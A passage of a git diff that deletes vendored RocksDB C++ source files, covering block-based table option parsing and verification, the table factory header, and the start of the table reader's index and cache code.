-  const auto& opt_info = iter->second;
-  if (opt_info.verification != OptionVerificationType::kDeprecated &&
-      !ParseOptionHelper(reinterpret_cast<char*>(new_options) + opt_info.offset,
-                         opt_info.type, value)) {
-    return "Invalid value";
-  }
-  return "";
-}
-}  // namespace
-
-Status GetBlockBasedTableOptionsFromString(
-    const BlockBasedTableOptions& table_options, const std::string& opts_str,
-    BlockBasedTableOptions* new_table_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    return s;
-  }
-
-  return GetBlockBasedTableOptionsFromMap(table_options, opts_map,
-                                          new_table_options);
-}
-
-Status GetBlockBasedTableOptionsFromMap(
-    const BlockBasedTableOptions& table_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    BlockBasedTableOptions* new_table_options, bool input_strings_escaped,
-    bool ignore_unknown_options) {
-  assert(new_table_options);
-  *new_table_options = table_options;
-  for (const auto& o : opts_map) {
-    auto error_message = ParseBlockBasedTableOption(
-        o.first, o.second, new_table_options, input_strings_escaped,
-        ignore_unknown_options);
-    if (error_message != "") {
-      const auto iter = block_based_table_type_info.find(o.first);
-      if (iter == block_based_table_type_info.end() ||
-          !input_strings_escaped ||  // !input_strings_escaped indicates
-                                     // the old API, where everything is
-                                     // parsable.
-          (iter->second.verification != OptionVerificationType::kByName &&
-           iter->second.verification !=
-               OptionVerificationType::kByNameAllowNull &&
-           iter->second.verification != OptionVerificationType::kDeprecated)) {
-        // Restore "new_options" to the default "base_options".
-        *new_table_options = table_options;
-        return Status::InvalidArgument("Can't parse BlockBasedTableOptions:",
-                                       o.first + " " + error_message);
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status VerifyBlockBasedTableFactory(
-    const BlockBasedTableFactory* base_tf,
-    const BlockBasedTableFactory* file_tf,
-    OptionsSanityCheckLevel sanity_check_level) {
-  if ((base_tf != nullptr) != (file_tf != nullptr) &&
-      sanity_check_level > kSanityLevelNone) {
-    return Status::Corruption(
-        "[RocksDBOptionsParser]: Inconsistent TableFactory class type");
-  }
-  if (base_tf == nullptr) {
-    return Status::OK();
-  }
-  assert(file_tf != nullptr);
-
-  const auto& base_opt = base_tf->table_options();
-  const auto& file_opt = file_tf->table_options();
-
-  for (auto& pair : block_based_table_type_info) {
-    if (pair.second.verification == OptionVerificationType::kDeprecated) {
-      // We skip checking deprecated variables as they might
-      // contain random values since they might not be initialized
-      continue;
-    }
-    if (BBTOptionSanityCheckLevel(pair.first) <= sanity_check_level) {
-      if (!AreEqualOptions(reinterpret_cast<const char*>(&base_opt),
-                           reinterpret_cast<const char*>(&file_opt),
-                           pair.second, pair.first, nullptr)) {
-        return Status::Corruption(
-            "[RocksDBOptionsParser]: "
-            "failed the verification on BlockBasedTableOptions::",
-            pair.first);
-      }
-    }
-  }
-  return Status::OK();
-}
-#endif  // !ROCKSDB_LITE
-
-TableFactory* NewBlockBasedTableFactory(
-    const BlockBasedTableOptions& _table_options) {
-  return new BlockBasedTableFactory(_table_options);
-}
-
-const std::string BlockBasedTableFactory::kName = "BlockBasedTable";
-const std::string BlockBasedTablePropertyNames::kIndexType =
-    "rocksdb.block.based.table.index.type";
-const std::string BlockBasedTablePropertyNames::kWholeKeyFiltering =
-    "rocksdb.block.based.table.whole.key.filtering";
-const std::string BlockBasedTablePropertyNames::kPrefixFiltering =
-    "rocksdb.block.based.table.prefix.filtering";
-const std::string kHashIndexPrefixesBlock = "rocksdb.hashindex.prefixes";
-const std::string kHashIndexPrefixesMetadataBlock =
-    "rocksdb.hashindex.metadata";
-const std::string kPropTrue = "1";
-const std::string kPropFalse = "0";
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_factory.h b/thirdparty/rocksdb/table/block_based_table_factory.h
deleted file mode 100644
index 39e3eac..0000000
--- a/thirdparty/rocksdb/table/block_based_table_factory.h
+++ /dev/null
@@ -1,157 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stdint.h>
-
-#include <memory>
-#include <string>
-
-#include "db/dbformat.h"
-#include "options/options_helper.h"
-#include "options/options_parser.h"
-#include "rocksdb/flush_block_policy.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-struct EnvOptions;
-
-using std::unique_ptr;
-class BlockBasedTableBuilder;
-
-class BlockBasedTableFactory : public TableFactory {
- public:
-  explicit BlockBasedTableFactory(
-      const BlockBasedTableOptions& table_options = BlockBasedTableOptions());
-
-  ~BlockBasedTableFactory() {}
-
-  const char* Name() const override { return kName.c_str(); }
-
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table_reader,
-      bool prefetch_index_and_filter_in_cache = true) const override;
-
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override;
-
-  // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override;
-
-  std::string GetPrintableTableOptions() const override;
-
-  Status GetOptionString(std::string* opt_string,
-                         const std::string& delimiter) const override;
-
-  const BlockBasedTableOptions& table_options() const;
-
-  void* GetOptions() override { return &table_options_; }
-
-  bool IsDeleteRangeSupported() const override { return true; }
-
-  static const std::string kName;
-
- private:
-  BlockBasedTableOptions table_options_;
-};
-
-extern const std::string kHashIndexPrefixesBlock;
-extern const std::string kHashIndexPrefixesMetadataBlock;
-extern const std::string kPropTrue;
-extern const std::string kPropFalse;
-
-#ifndef ROCKSDB_LITE
-extern Status VerifyBlockBasedTableFactory(
-    const BlockBasedTableFactory* base_tf,
-    const BlockBasedTableFactory* file_tf,
-    OptionsSanityCheckLevel sanity_check_level);
-
-static std::unordered_map<std::string, OptionTypeInfo>
-    block_based_table_type_info = {
-        /* currently not supported
-          std::shared_ptr<Cache> block_cache = nullptr;
-          std::shared_ptr<Cache> block_cache_compressed = nullptr;
-         */
-        {"flush_block_policy_factory",
-         {offsetof(struct BlockBasedTableOptions, flush_block_policy_factory),
-          OptionType::kFlushBlockPolicyFactory, OptionVerificationType::kByName,
-          false, 0}},
-        {"cache_index_and_filter_blocks",
-         {offsetof(struct BlockBasedTableOptions,
-                   cache_index_and_filter_blocks),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"cache_index_and_filter_blocks_with_high_priority",
-         {offsetof(struct BlockBasedTableOptions,
-                   cache_index_and_filter_blocks_with_high_priority),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"pin_l0_filter_and_index_blocks_in_cache",
-         {offsetof(struct BlockBasedTableOptions,
-                   pin_l0_filter_and_index_blocks_in_cache),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"index_type",
-         {offsetof(struct BlockBasedTableOptions, index_type),
-          OptionType::kBlockBasedTableIndexType,
-          OptionVerificationType::kNormal, false, 0}},
-        {"hash_index_allow_collision",
-         {offsetof(struct BlockBasedTableOptions, hash_index_allow_collision),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"checksum",
-         {offsetof(struct BlockBasedTableOptions, checksum),
-          OptionType::kChecksumType, OptionVerificationType::kNormal, false,
-          0}},
-        {"no_block_cache",
-         {offsetof(struct BlockBasedTableOptions, no_block_cache),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"block_size",
-         {offsetof(struct BlockBasedTableOptions, block_size),
-          OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-        {"block_size_deviation",
-         {offsetof(struct BlockBasedTableOptions, block_size_deviation),
-          OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-        {"block_restart_interval",
-         {offsetof(struct BlockBasedTableOptions, block_restart_interval),
-          OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-        {"index_block_restart_interval",
-         {offsetof(struct BlockBasedTableOptions, index_block_restart_interval),
-          OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-        {"index_per_partition",
-         {0, OptionType::kUInt64T, OptionVerificationType::kDeprecated, false,
-          0}},
-        {"metadata_block_size",
-         {offsetof(struct BlockBasedTableOptions, metadata_block_size),
-          OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}},
-        {"partition_filters",
-         {offsetof(struct BlockBasedTableOptions, partition_filters),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"filter_policy",
-         {offsetof(struct BlockBasedTableOptions, filter_policy),
-          OptionType::kFilterPolicy, OptionVerificationType::kByName, false,
-          0}},
-        {"whole_key_filtering",
-         {offsetof(struct BlockBasedTableOptions, whole_key_filtering),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"skip_table_builder_flush",
-         {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false,
-          0}},
-        {"format_version",
-         {offsetof(struct BlockBasedTableOptions, format_version),
-          OptionType::kUInt32T, OptionVerificationType::kNormal, false, 0}},
-        {"verify_compression",
-         {offsetof(struct BlockBasedTableOptions, verify_compression),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"read_amp_bytes_per_bit",
-         {offsetof(struct BlockBasedTableOptions, read_amp_bytes_per_bit),
-          OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}};
-#endif  // !ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_reader.cc b/thirdparty/rocksdb/table/block_based_table_reader.cc
deleted file mode 100644
index d8c6d80..0000000
--- a/thirdparty/rocksdb/table/block_based_table_reader.cc
+++ /dev/null
@@ -1,2455 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "table/block_based_table_reader.h"
-
-#include <algorithm>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/pinned_iterators_manager.h"
-
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-
-#include "table/block.h"
-#include "table/block_based_filter_block.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_prefix_index.h"
-#include "table/filter_block.h"
-#include "table/format.h"
-#include "table/full_filter_block.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/partitioned_filter_block.h"
-#include "table/persistent_cache_helper.h"
-#include "table/sst_file_writer_collectors.h"
-#include "table/two_level_iterator.h"
-
-#include "monitoring/perf_context_imp.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const std::string kHashIndexPrefixesBlock;
-extern const std::string kHashIndexPrefixesMetadataBlock;
-using std::unique_ptr;
-
-typedef BlockBasedTable::IndexReader IndexReader;
-
-BlockBasedTable::~BlockBasedTable() {
-  Close();
-  delete rep_;
-}
-
-namespace {
-// Read the block identified by "handle" from "file".
-// The only relevant option is options.verify_checksums for now.
-// On failure return non-OK.
-// On success fill *result and return OK - caller owns *result
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-Status ReadBlockFromFile(
-    RandomAccessFileReader* file, FilePrefetchBuffer* prefetch_buffer,
-    const Footer& footer, const ReadOptions& options, const BlockHandle& handle,
-    std::unique_ptr<Block>* result, const ImmutableCFOptions& ioptions,
-    bool do_uncompress, const Slice& compression_dict,
-    const PersistentCacheOptions& cache_options, SequenceNumber global_seqno,
-    size_t read_amp_bytes_per_bit) {
-  BlockContents contents;
-  Status s = ReadBlockContents(file, prefetch_buffer, footer, options, handle,
-                               &contents, ioptions, do_uncompress,
-                               compression_dict, cache_options);
-  if (s.ok()) {
-    result->reset(new Block(std::move(contents), global_seqno,
-                            read_amp_bytes_per_bit, ioptions.statistics));
-  }
-
-  return s;
-}
-
-// Delete the resource that is held by the iterator.
-template <class ResourceType>
-void DeleteHeldResource(void* arg, void* ignored) {
-  delete reinterpret_cast<ResourceType*>(arg);
-}
-
-// Delete the entry resided in the cache.
-template <class Entry>
-void DeleteCachedEntry(const Slice& key, void* value) {
-  auto entry = reinterpret_cast<Entry*>(value);
-  delete entry;
-}
-
-void DeleteCachedFilterEntry(const Slice& key, void* value);
-void DeleteCachedIndexEntry(const Slice& key, void* value);
-
-// Release the cached entry and decrement its ref count.
-void ReleaseCachedEntry(void* arg, void* h) {
-  Cache* cache = reinterpret_cast<Cache*>(arg);
-  Cache::Handle* handle = reinterpret_cast<Cache::Handle*>(h);
-  cache->Release(handle);
-}
-
-Slice GetCacheKeyFromOffset(const char* cache_key_prefix,
-                            size_t cache_key_prefix_size, uint64_t offset,
-                            char* cache_key) {
-  assert(cache_key != nullptr);
-  assert(cache_key_prefix_size != 0);
-  assert(cache_key_prefix_size <= BlockBasedTable::kMaxCacheKeyPrefixSize);
-  memcpy(cache_key, cache_key_prefix, cache_key_prefix_size);
-  char* end = EncodeVarint64(cache_key + cache_key_prefix_size, offset);
-  return Slice(cache_key, static_cast<size_t>(end - cache_key));
-}
-
-Cache::Handle* GetEntryFromCache(Cache* block_cache, const Slice& key,
-                                 Tickers block_cache_miss_ticker,
-                                 Tickers block_cache_hit_ticker,
-                                 Statistics* statistics) {
-  auto cache_handle = block_cache->Lookup(key, statistics);
-  if (cache_handle != nullptr) {
-    PERF_COUNTER_ADD(block_cache_hit_count, 1);
-    // overall cache hit
-    RecordTick(statistics, BLOCK_CACHE_HIT);
-    // total bytes read from cache
-    RecordTick(statistics, BLOCK_CACHE_BYTES_READ,
-               block_cache->GetUsage(cache_handle));
-    // block-type specific cache hit
-    RecordTick(statistics, block_cache_hit_ticker);
-  } else {
-    // overall cache miss
-    RecordTick(statistics, BLOCK_CACHE_MISS);
-    // block-type specific cache miss
-    RecordTick(statistics, block_cache_miss_ticker);
-  }
-
-  return cache_handle;
-}
-
-}  // namespace
-
-// Index that allows binary search lookup in a two-level index structure.
-class PartitionIndexReader : public IndexReader, public Cleanable {
- public:
-  // Read the partition index from the file and create an instance for
-  // `PartitionIndexReader`.
-  // On success, index_reader will be populated; otherwise it will remain
-  // unmodified.
-  static Status Create(BlockBasedTable* table, RandomAccessFileReader* file,
-                       FilePrefetchBuffer* prefetch_buffer,
-                       const Footer& footer, const BlockHandle& index_handle,
-                       const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icomparator,
-                       IndexReader** index_reader,
-                       const PersistentCacheOptions& cache_options,
-                       const int level) {
-    std::unique_ptr<Block> index_block;
-    auto s = ReadBlockFromFile(
-        file, prefetch_buffer, footer, ReadOptions(), index_handle,
-        &index_block, ioptions, true /* decompress */,
-        Slice() /*compression dict*/, cache_options,
-        kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */);
-
-    if (s.ok()) {
-      *index_reader =
-          new PartitionIndexReader(table, icomparator, std::move(index_block),
-                                   ioptions.statistics, level);
-    }
-
-    return s;
-  }
-
-  // return a two-level iterator: first level is on the partition index
-  virtual InternalIterator* NewIterator(BlockIter* iter = nullptr,
-                                        bool dont_care = true) override {
-    // Filters are already checked before seeking the index
-    const bool skip_filters = true;
-    const bool is_index = true;
-    return NewTwoLevelIterator(
-        new BlockBasedTable::BlockEntryIteratorState(
-            table_, ReadOptions(), icomparator_, skip_filters, is_index,
-            partition_map_.size() ? &partition_map_ : nullptr),
-        index_block_->NewIterator(icomparator_, nullptr, true));
-    // TODO(myabandeh): Update TwoLevelIterator to be able to make use of
-    // on-stack BlockIter while the state is on heap. Currentlly it assumes
-    // the first level iter is always on heap and will attempt to delete it
-    // in its destructor.
-  }
-
-  virtual void CacheDependencies(bool pin) override {
-    // Before read partitions, prefetch them to avoid lots of IOs
-    auto rep = table_->rep_;
-    BlockIter biter;
-    BlockHandle handle;
-    index_block_->NewIterator(icomparator_, &biter, true);
-    // Index partitions are assumed to be consecuitive. Prefetch them all.
-    // Read the first block offset
-    biter.SeekToFirst();
-    Slice input = biter.value();
-    Status s = handle.DecodeFrom(&input);
-    assert(s.ok());
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(rep->ioptions.info_log,
-                     "Could not read first index partition");
-      return;
-    }
-    uint64_t prefetch_off = handle.offset();
-
-    // Read the last block's offset
-    biter.SeekToLast();
-    input = biter.value();
-    s = handle.DecodeFrom(&input);
-    assert(s.ok());
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(rep->ioptions.info_log,
-                     "Could not read last index partition");
-      return;
-    }
-    uint64_t last_off = handle.offset() + handle.size() + kBlockTrailerSize;
-    uint64_t prefetch_len = last_off - prefetch_off;
-    std::unique_ptr<FilePrefetchBuffer> prefetch_buffer;
-    auto& file = table_->rep_->file;
-    prefetch_buffer.reset(new FilePrefetchBuffer());
-    s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len);
-
-    // After prefetch, read the partitions one by one
-    biter.SeekToFirst();
-    auto ro = ReadOptions();
-    Cache* block_cache = rep->table_options.block_cache.get();
-    for (; biter.Valid(); biter.Next()) {
-      input = biter.value();
-      s = handle.DecodeFrom(&input);
-      assert(s.ok());
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(rep->ioptions.info_log,
-                       "Could not read index partition");
-        continue;
-      }
-
-      BlockBasedTable::CachableEntry<Block> block;
-      Slice compression_dict;
-      if (rep->compression_dict_block) {
-        compression_dict = rep->compression_dict_block->data;
-      }
-      const bool is_index = true;
-      s = table_->MaybeLoadDataBlockToCache(prefetch_buffer.get(), rep, ro,
-                                            handle, compression_dict, &block,
-                                            is_index);
-
-      assert(s.ok() || block.value == nullptr);
-      if (s.ok() && block.value != nullptr) {
-        assert(block.cache_handle != nullptr);
-        if (pin) {
-          partition_map_[handle.offset()] = block;
-          RegisterCleanup(&ReleaseCachedEntry, block_cache, block.cache_handle);
-        } else {
-          block_cache->Release(block.cache_handle);
-        }
-      }
-    }
-  }
-
-  virtual size_t size() const override { return index_block_->size(); }
-  virtual size_t usable_size() const override {
-    return index_block_->usable_size();
-  }
-
-  virtual size_t ApproximateMemoryUsage() const override {
-    assert(index_block_);
-    return index_block_->ApproximateMemoryUsage();
-  }
-
- private:
-  PartitionIndexReader(BlockBasedTable* table,
-                       const InternalKeyComparator* icomparator,
-                       std::unique_ptr<Block>&& index_block, Statistics* stats,
-                       const int level)
-      : IndexReader(icomparator, stats),
-        table_(table),
-        index_block_(std::move(index_block)) {
-    assert(index_block_ != nullptr);
-  }
-  BlockBasedTable* table_;
-  std::unique_ptr<Block> index_block_;
-  std::unordered_map<uint64_t, BlockBasedTable::CachableEntry<Block>>
-      partition_map_;
-};
-
-// Index that allows binary search lookup for the first key of each block.
-// This class can be viewed as a thin wrapper for `Block` class which already
-// supports binary search.
-class BinarySearchIndexReader : public IndexReader {
- public:
-  // Read index from the file and create an intance for
-  // `BinarySearchIndexReader`.
-  // On success, index_reader will be populated; otherwise it will remain
-  // unmodified.
-  static Status Create(RandomAccessFileReader* file,
-                       FilePrefetchBuffer* prefetch_buffer,
-                       const Footer& footer, const BlockHandle& index_handle,
-                       const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icomparator,
-                       IndexReader** index_reader,
-                       const PersistentCacheOptions& cache_options) {
-    std::unique_ptr<Block> index_block;
-    auto s = ReadBlockFromFile(
-        file, prefetch_buffer, footer, ReadOptions(), index_handle,
-        &index_block, ioptions, true /* decompress */,
-        Slice() /*compression dict*/, cache_options,
-        kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */);
-
-    if (s.ok()) {
-      *index_reader = new BinarySearchIndexReader(
-          icomparator, std::move(index_block), ioptions.statistics);
-    }
-
-    return s;
-  }
-
-  virtual InternalIterator* NewIterator(BlockIter* iter = nullptr,
-                                        bool dont_care = true) override {
-    return index_block_->NewIterator(icomparator_, iter, true);
-  }
-
-  virtual size_t size() const override { return index_block_->size(); }
-  virtual size_t usable_size() const override {
-    return index_block_->usable_size();
-  }
-
-  virtual size_t ApproximateMemoryUsage() const override {
-    assert(index_block_);
-    return index_block_->ApproximateMemoryUsage();
-  }
-
- private:
-  BinarySearchIndexReader(const InternalKeyComparator* icomparator,
-                          std::unique_ptr<Block>&& index_block,
-                          Statistics* stats)
-      : IndexReader(icomparator, stats), index_block_(std::move(index_block)) {
-    assert(index_block_ != nullptr);
-  }
-  std::unique_ptr<Block> index_block_;
-};
-
-// Index that leverages an internal hash table to quicken the lookup for a given
-// key.
-class HashIndexReader : public IndexReader {
- public:
-  static Status Create(const SliceTransform* hash_key_extractor,
-                       const Footer& footer, RandomAccessFileReader* file,
-                       FilePrefetchBuffer* prefetch_buffer,
-                       const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icomparator,
-                       const BlockHandle& index_handle,
-                       InternalIterator* meta_index_iter,
-                       IndexReader** index_reader,
-                       bool hash_index_allow_collision,
-                       const PersistentCacheOptions& cache_options) {
-    std::unique_ptr<Block> index_block;
-    auto s = ReadBlockFromFile(
-        file, prefetch_buffer, footer, ReadOptions(), index_handle,
-        &index_block, ioptions, true /* decompress */,
-        Slice() /*compression dict*/, cache_options,
-        kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */);
-
-    if (!s.ok()) {
-      return s;
-    }
-
-    // Note, failure to create prefix hash index does not need to be a
-    // hard error. We can still fall back to the original binary search index.
-    // So, Create will succeed regardless, from this point on.
-
-    auto new_index_reader =
-        new HashIndexReader(icomparator, std::move(index_block),
-          ioptions.statistics);
-    *index_reader = new_index_reader;
-
-    // Get prefixes block
-    BlockHandle prefixes_handle;
-    s = FindMetaBlock(meta_index_iter, kHashIndexPrefixesBlock,
-                      &prefixes_handle);
-    if (!s.ok()) {
-      // TODO: log error
-      return Status::OK();
-    }
-
-    // Get index metadata block
-    BlockHandle prefixes_meta_handle;
-    s = FindMetaBlock(meta_index_iter, kHashIndexPrefixesMetadataBlock,
-                      &prefixes_meta_handle);
-    if (!s.ok()) {
-      // TODO: log error
-      return Status::OK();
-    }
-
-    // Read contents for the blocks
-    BlockContents prefixes_contents;
-    s = ReadBlockContents(file, prefetch_buffer, footer, ReadOptions(),
-                          prefixes_handle, &prefixes_contents, ioptions,
-                          true /* decompress */, Slice() /*compression dict*/,
-                          cache_options);
-    if (!s.ok()) {
-      return s;
-    }
-    BlockContents prefixes_meta_contents;
-    s = ReadBlockContents(file, prefetch_buffer, footer, ReadOptions(),
-                          prefixes_meta_handle, &prefixes_meta_contents,
-                          ioptions, true /* decompress */,
-                          Slice() /*compression dict*/, cache_options);
-    if (!s.ok()) {
-      // TODO: log error
-      return Status::OK();
-    }
-
-    BlockPrefixIndex* prefix_index = nullptr;
-    s = BlockPrefixIndex::Create(hash_key_extractor, prefixes_contents.data,
-                                 prefixes_meta_contents.data, &prefix_index);
-    // TODO: log error
-    if (s.ok()) {
-      new_index_reader->index_block_->SetBlockPrefixIndex(prefix_index);
-    }
-
-    return Status::OK();
-  }
-
-  virtual InternalIterator* NewIterator(BlockIter* iter = nullptr,
-                                        bool total_order_seek = true) override {
-    return index_block_->NewIterator(icomparator_, iter, total_order_seek);
-  }
-
-  virtual size_t size() const override { return index_block_->size(); }
-  virtual size_t usable_size() const override {
-    return index_block_->usable_size();
-  }
-
-  virtual size_t ApproximateMemoryUsage() const override {
-    assert(index_block_);
-    return index_block_->ApproximateMemoryUsage() +
-           prefixes_contents_.data.size();
-  }
-
- private:
-  HashIndexReader(const InternalKeyComparator* icomparator,
-                  std::unique_ptr<Block>&& index_block, Statistics* stats)
-      : IndexReader(icomparator, stats), index_block_(std::move(index_block)) {
-    assert(index_block_ != nullptr);
-  }
-
-  ~HashIndexReader() {
-  }
-
-  std::unique_ptr<Block> index_block_;
-  BlockContents prefixes_contents_;
-};
-
-// Helper function to setup the cache key's prefix for the Table.
-void BlockBasedTable::SetupCacheKeyPrefix(Rep* rep, uint64_t file_size) {
-  assert(kMaxCacheKeyPrefixSize >= 10);
-  rep->cache_key_prefix_size = 0;
-  rep->compressed_cache_key_prefix_size = 0;
-  if (rep->table_options.block_cache != nullptr) {
-    GenerateCachePrefix(rep->table_options.block_cache.get(), rep->file->file(),
-                        &rep->cache_key_prefix[0], &rep->cache_key_prefix_size);
-    // Create dummy offset of index reader which is beyond the file size.
-    rep->dummy_index_reader_offset =
-        file_size + rep->table_options.block_cache->NewId();
-  }
-  if (rep->table_options.persistent_cache != nullptr) {
-    GenerateCachePrefix(/*cache=*/nullptr, rep->file->file(),
-                        &rep->persistent_cache_key_prefix[0],
-                        &rep->persistent_cache_key_prefix_size);
-  }
-  if (rep->table_options.block_cache_compressed != nullptr) {
-    GenerateCachePrefix(rep->table_options.block_cache_compressed.get(),
-                        rep->file->file(), &rep->compressed_cache_key_prefix[0],
-                        &rep->compressed_cache_key_prefix_size);
-  }
-}
-
-void BlockBasedTable::GenerateCachePrefix(Cache* cc,
-    RandomAccessFile* file, char* buffer, size_t* size) {
-
-  // generate an id from the file
-  *size = file->GetUniqueId(buffer, kMaxCacheKeyPrefixSize);
-
-  // If the prefix wasn't generated or was too long,
-  // create one from the cache.
-  if (cc && *size == 0) {
-    char* end = EncodeVarint64(buffer, cc->NewId());
-    *size = static_cast<size_t>(end - buffer);
-  }
-}
-
-void BlockBasedTable::GenerateCachePrefix(Cache* cc,
-    WritableFile* file, char* buffer, size_t* size) {
-
-  // generate an id from the file
-  *size = file->GetUniqueId(buffer, kMaxCacheKeyPrefixSize);
-
-  // If the prefix wasn't generated or was too long,
-  // create one from the cache.
-  if (*size == 0) {
-    char* end = EncodeVarint64(buffer, cc->NewId());
-    *size = static_cast<size_t>(end - buffer);
-  }
-}
-
-namespace {
-// Return True if table_properties has `user_prop_name` has a `true` value
-// or it doesn't contain this property (for backward compatible).
-bool IsFeatureSupported(const TableProperties& table_properties,
-                        const std::string& user_prop_name, Logger* info_log) {
-  auto& props = table_properties.user_collected_properties;
-  auto pos = props.find(user_prop_name);
-  // Older version doesn't have this value set. Skip this check.
-  if (pos != props.end()) {
-    if (pos->second == kPropFalse) {
-      return false;
-    } else if (pos->second != kPropTrue) {
-      ROCKS_LOG_WARN(info_log, "Property %s has invalidate value %s",
-                     user_prop_name.c_str(), pos->second.c_str());
-    }
-  }
-  return true;
-}
-
-SequenceNumber GetGlobalSequenceNumber(const TableProperties& table_properties,
-                                       Logger* info_log) {
-  auto& props = table_properties.user_collected_properties;
-
-  auto version_pos = props.find(ExternalSstFilePropertyNames::kVersion);
-  auto seqno_pos = props.find(ExternalSstFilePropertyNames::kGlobalSeqno);
-
-  if (version_pos == props.end()) {
-    if (seqno_pos != props.end()) {
-      // This is not an external sst file, global_seqno is not supported.
-      assert(false);
-      ROCKS_LOG_ERROR(
-          info_log,
-          "A non-external sst file have global seqno property with value %s",
-          seqno_pos->second.c_str());
-    }
-    return kDisableGlobalSequenceNumber;
-  }
-
-  uint32_t version = DecodeFixed32(version_pos->second.c_str());
-  if (version < 2) {
-    if (seqno_pos != props.end() || version != 1) {
-      // This is a v1 external sst file, global_seqno is not supported.
-      assert(false);
-      ROCKS_LOG_ERROR(
-          info_log,
-          "An external sst file with version %u have global seqno property "
-          "with value %s",
-          version, seqno_pos->second.c_str());
-    }
-    return kDisableGlobalSequenceNumber;
-  }
-
-  SequenceNumber global_seqno = DecodeFixed64(seqno_pos->second.c_str());
-
-  if (global_seqno > kMaxSequenceNumber) {
-    assert(false);
-    ROCKS_LOG_ERROR(
-        info_log,
-        "An external sst file with version %u have global seqno property "
-        "with value %llu, which is greater than kMaxSequenceNumber",
-        version, global_seqno);
-  }
-
-  return global_seqno;
-}
-}  // namespace
-
-Slice BlockBasedTable::GetCacheKey(const char* cache_key_prefix,
-                                   size_t cache_key_prefix_size,
-                                   const BlockHandle& handle, char* cache_key) {
-  assert(cache_key != nullptr);
-  assert(cache_key_prefix_size != 0);
-  assert(cache_key_prefix_size <= kMaxCacheKeyPrefixSize);
-  memcpy(cache_key, cache_key_prefix, cache_key_prefix_size);
-  char* end =
-      EncodeVarint64(cache_key + cache_key_prefix_size, handle.offset());
-  return Slice(cache_key, static_cast<size_t>(end - cache_key));
-}
-
-Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions,
-                             const EnvOptions& env_options,
-                             const BlockBasedTableOptions& table_options,
-                             const InternalKeyComparator& internal_comparator,
-                             unique_ptr<RandomAccessFileReader>&& file,
-                             uint64_t file_size,
-                             unique_ptr<TableReader>* table_reader,
-                             const bool prefetch_index_and_filter_in_cache,
-                             const bool skip_filters, const int level) {
-  table_reader->reset();
-
-  Footer footer;
-
-  std::unique_ptr<FilePrefetchBuffer> prefetch_buffer;
-
-  // Before read footer, readahead backwards to prefetch data
-  const size_t kTailPrefetchSize = 512 * 1024;
-  size_t prefetch_off;
-  size_t prefetch_len;
-  if (file_size < kTailPrefetchSize) {
